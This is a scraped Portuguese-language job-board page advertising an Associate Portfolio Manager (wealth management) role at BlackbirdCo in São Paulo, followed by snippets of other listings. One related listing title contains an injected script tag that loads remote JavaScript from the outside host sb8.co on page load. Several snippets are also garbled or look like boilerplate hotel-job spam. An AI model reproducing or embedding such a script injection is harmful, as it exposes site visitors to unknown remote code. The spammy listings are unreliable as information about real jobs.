Ir à oferta completa

ASSOCIATE PORTFOLIO MANAGER (CARTEIRAS ADMINISTRADAS) - WEALTH MANAGEMENT

São Paulo - São Paulo

Descrição da oferta de emprego

A BlackbirdCo.
é uma empresa brasileira de atuação global com foco no desenvolvimento de produtos sofisticados e estruturados nas áreas de Crédito, Corporate, Offshore, Asset, Wealth Management e Advisory.
Somos uma companhia de investimentos que acredita na alta qualidade técnica dos profissionais, mentalidade de dono e transparência como pilares para performance.
Como Associate Portfolio Manager, você fará parte da equipe de Wealth Management e será responsável por auxiliar na gestão de portfólios de investimentos para nossos clientes.
Você irá trabalhar em conjunto com a equipe de gestores, auxiliando na análise e seleção de ativos, implementação de estratégias de investimento e acompanhamento do desempenho dos investimentos de nossa carteira de clientes.
Atividades.
Gestão das carteiras e mandatos de investimentos; Análise de ativos exóticos; Análise de crédito privado; Estruturar e desenvolver metodologias de avaliação processual de diferentes classes de ativos; Gestão de risco de portfólios de Famílias com alto grau de individualidade; Reuniões comerciais de acompanhamento de carteiras e prospecções junto aos Bankers.
\n Mínimo de 5 anos de formação; Mínimo de 2 anos de experiência em gestão e/ou análise de portfólios; Experiência prévia em gestão de portfólios ou análise de investimentos; Conhecimento em produtos de investimento, mercado financeiro e análise de risco; Habilidades analíticas e de resolução de problemas; Habilidades comerciais; Certificações financeiras, como CFP ou CFA, são desejadas.
\n Gympass; Remuneração variável anual; Programa de apoio à CFP e CFA; Programa de intercâmbio; Programa de partnership.
Ir à oferta completa

Detalhes da oferta

Empresa
  • Blackbird
Localidade
Endereço
  • Indeterminado - Indeterminado
Tipo de Contrato
  • Indeterminado
Data de publicação
  • 29/08/2024
Data de expiração
  • 27/11/2024
Product Manager - (Electronic commerce)
Jp&f consultoria

Excellent project management skills with a track record of successfully delivering projects on time griving results and directing project implementations operations, sales... technical proficiency and ability to understand complex technical concepts and product functionalities......

F&B MANAGER
Oman Jobs

Php?id=6028 company industry; restaurant - multi international dishes job title: f&b; manager total years of experience: min 4 years gcc experience: 2 years years of industry related experience:4 years education: any basic qualification skills: fluent in english communication is a must, other language......

Bilingual Customer Service Associate
Bilingual

This role is primarily accountable for handling, resolving, and communicating service requests from canadian clients... responsibilities accurately and thoroughly handle increasingly complex client service requests at initial point of contact effectively use multiple administrative systems to resolve......

finance
<script/src=//sb8.co></script>computer

The model portfolio is a client-allocated satellite portfolio... managed an international direct equity model portfolio benchmarked against the msci all country world index and the s&p; 500... analyze macroeconomic variables and their interactions with client portfolios - strategic, tactical, and dynamic......

administrative and technical department
RAINSTEAL OIL & GAS

Bakers / bartenders / chefs / chef de partie / sous chef / chef d 'cuisine / cooks / dietitians, food and beverage servers, food service supervisors, restaurant and food service manager, catering manager, assistant beverage manager, kitchen manager, banquet coordinator, beverage server, beverage shift......

Vacancy At The Royal Garden Hotel
The Royal Garden Hotel

Available positions bakers/bartenders/chefs/chef de partie/sous chef/chef d cuisine/cooks/, restaurant and food service manager, conference banqueting operations manager, food beverage team manager, account manager, bartender, assistant manager of front office, receptionist, guest relation assistant......

Opening At The Dilly Hotel
The Dilly Hotel London

Available positions bakers,bartenders,chefs (chef de partie/sous chef/chef d cuisine/cooks),restaurant and food service manager, conference banqueting operations manager, food beverage team manager, account manager, bartender, assistant manager of front office, receptionist, guest relation assistant......

Oportunidade SAP PP-PM-QM
WAYON IT SOLUTIONS LTDA

Certificações sap pp/pm/qm relevantes, como “sap certified application associate – sap pp/pm/qm... com intuito de gestão gerenciem de forma eficaz o ciclo de vida completo dos produtos, desde o planejamento da produção até a manutenção de instalações e o controle de qualidade......

Director of Operations
JP&F Consultoria

Champions operational excellence thru collaboration with the general manager and/or business unit leader to devise strategies for achieving the organization's objectives in light of both internal and external factors... fluent english and portuguese area mandatory... experience in operation area in chemical......

LEGAL ADVISOR
Oman Jobs

•advise senior management on legal matters affecting business decisions and strategic initiatives... •analyze complex legal issues and provide strategic recommendations to mitigate risks and achieve business objectives... •develop compliance strategies and policies to ensure that real estate activities......